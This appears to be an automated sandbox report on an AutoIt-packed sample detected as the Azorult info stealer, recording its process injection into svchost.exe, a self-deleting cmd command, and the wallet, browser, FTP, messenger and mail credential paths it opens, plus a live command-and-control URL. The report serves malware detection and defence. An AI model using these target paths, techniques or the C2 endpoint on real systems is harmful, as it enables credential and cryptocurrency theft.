            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007842DE
            Source: svchost.exe, 00000001.00000002.1814289197.000000000365F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: svchost.exe, 00000001.00000002.1813546210.0000000003631000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
            Source: svchost.exe, 00000001.00000002.1814354136.0000000003679000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMSAFD L2CAP [Bluetooth]NativeFontCtl H
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007FEAA2 BlockInput,0_2_007FEAA2
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007B2622
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,GetCurrentProcessId,1_2_00416B94
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007842DE
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A4CE8 mov eax, dword ptr fs:[00000030h]0_2_007A4CE8
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_01E434E0 mov eax, dword ptr fs:[00000030h]0_2_01E434E0
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_01E43480 mov eax, dword ptr fs:[00000030h]0_2_01E43480
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_01E41E70 mov eax, dword ptr fs:[00000030h]0_2_01E41E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407A34 mov eax, dword ptr fs:[00000030h]1_2_00407A34
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_007E0B62
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007B2622
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007A083F
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A09D5 SetUnhandledExceptionFilter,0_2_007A09D5
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007A0C21

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.128.117 80Jump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 30F6008Jump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_007E1201
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_007C2BA5
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007EB226 SendInput,keybd_event,0_2_007EB226
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_008022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_008022DA
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\cJX8BV8LYG.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3Jump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_007E0B62
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007E1663
            Source: cJX8BV8LYG.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: cJX8BV8LYG.exeBinary or memory string: Shell_TrayWnd
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007A0698 cpuid 0_2_007A0698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,1_2_00416FB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,1_2_00404B4C
            Source: C:\Windows\SysWOW64\svchost.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_007F8195
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007DD27A GetUserNameW,0_2_007DD27A
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007BBB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_007BBB6F
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_007842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007842DE
            Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Azorult
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1816856617.0000000006C60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cJX8BV8LYG.exe PID: 5016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4940, type: MEMORYSTR
            Yara detected Azorult Info Stealer
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.cJX8BV8LYG.exe.1e50000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.cJX8BV8LYG.exe.1e50000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1812372698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1707421227.0000000001E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: cJX8BV8LYG.exe PID: 5016, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4940, type: MEMORYSTR
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: svchost.exe, 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: electrum.dat
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: svchost.exe, 00000001.00000002.1816447346.00000000062C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus Eden\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
            Source: svchost.exe, 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
            Tries to harvest and steal Bitcoin Wallet information
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Exodus Eden\Jump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
            Tries to steal Instant Messenger accounts or passwords
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
            Source: cJX8BV8LYG.exeBinary or memory string: WIN_81
            Source: cJX8BV8LYG.exeBinary or memory string: WIN_XP
            Source: cJX8BV8LYG.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: cJX8BV8LYG.exeBinary or memory string: WIN_XPe
            Source: cJX8BV8LYG.exeBinary or memory string: WIN_VISTA
            Source: cJX8BV8LYG.exeBinary or memory string: WIN_7
            Source: cJX8BV8LYG.exeBinary or memory string: WIN_8
            Source: Yara matchFile source: 1.2.svchost.exe.684a82d.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.68b5f7e.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.6828840.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1816558459.0000000006810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4940, type: MEMORYSTR
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_00801204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00801204
            Source: C:\Users\user\Desktop\cJX8BV8LYG.exeCode function: 0_2_00801806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00801806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		2
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		1
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol4
            Data from Local System            		2
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
            Valid Accounts            		2
            Obfuscated Files or Information            		2
            Credentials in Registry            		2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		2
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
            Access Token Manipulation            		1
            Timestomp            		1
            Credentials In Files            		147
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		112
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script312
            Process Injection            		1
            DLL Side-Loading            		LSA Secrets231
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
            Valid Accounts            		Cached Domain Credentials1
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501450 Sample: cJX8BV8LYG.exe Startdate: 29/08/2024 Architecture: WINDOWS Score: 100 31 ln6b9.shop 2->31 35 Suricata IDS alerts for network traffic 2->35 37 Found malware configuration 2->37 39 Malicious sample detected (through community Yara rule) 2->39 41 8 other signatures 2->41 9 cJX8BV8LYG.exe 4 2->9         started        signatures3 process4 signatures5 43 Binary is likely a compiled AutoIt script file 9->43 45 Found API chain indicative of sandbox detection 9->45 47 Writes to foreign memory regions 9->47 49 2 other signatures 9->49 12 svchost.exe 63 9->12         started        process6 dnsIp7 33 ln6b9.shop 172.67.128.117, 49730, 49731, 80 CLOUDFLARENETUS United States 12->33 23 C:\Users\user\AppData\...\vcruntime140.dll, PE32 12->23 dropped 25 C:\Users\user\AppData\Local\...\ucrtbase.dll, PE32 12->25 dropped 27 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 12->27 dropped 29 45 other files (none is malicious) 12->29 dropped 51 System process connects to network (likely due to code injection or exploit) 12->51 53 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->53 55 Tries to steal Instant Messenger accounts or passwords 12->55 57 6 other signatures 12->57 17 cmd.exe 1 12->17         started        file8 signatures9 process10 process11 19 conhost.exe 17->19         started        21 timeout.exe 1 17->21         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            cJX8BV8LYG.exe68%ReversingLabsWin32.Trojan.AgentTesla
            cJX8BV8LYG.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-memory-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-namedpipe-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processenvironment-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-processthreads-l1-1-1.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-profile-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-rtlsupport-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-string-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-synch-l1-2-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-sysinfo-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-timezone-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-core-util-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-conio-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-convert-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-environment-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-filesystem-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-locale-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-multibyte-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-private-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-process-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-time-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\api-ms-win-crt-utility-l1-1-0.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\freebl3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\mozglue.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\msvcp140.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\nss3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\nssdbm3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\softokn3.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\ucrtbase.dll0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\CFBCB28B\vcruntime140.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
            http://ocsp.thawte.com00%URL Reputationsafe
            http://www.mozilla.com/en-US/blocklist/0%Avira URL Cloudsafe
            http://ln6b9.shop/LN341/index.phpA0%Avira URL Cloudsafe
            http://ip-api.com/json0%URL Reputationsafe
            http://ln6b9.shop/LN341/index.php100%Avira URL Cloudmalware
            http://www.mozilla.com00%URL Reputationsafe
            https://dotbit.me/a/0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ln6b9.shop
            		172.67.128.117
            		truetrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://ln6b9.shop/LN341/index.phptrue
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.mozilla.com/en-US/blocklist/mozglue.dll.1.drfalse
              • Avira URL Cloud: safe
              		unknown
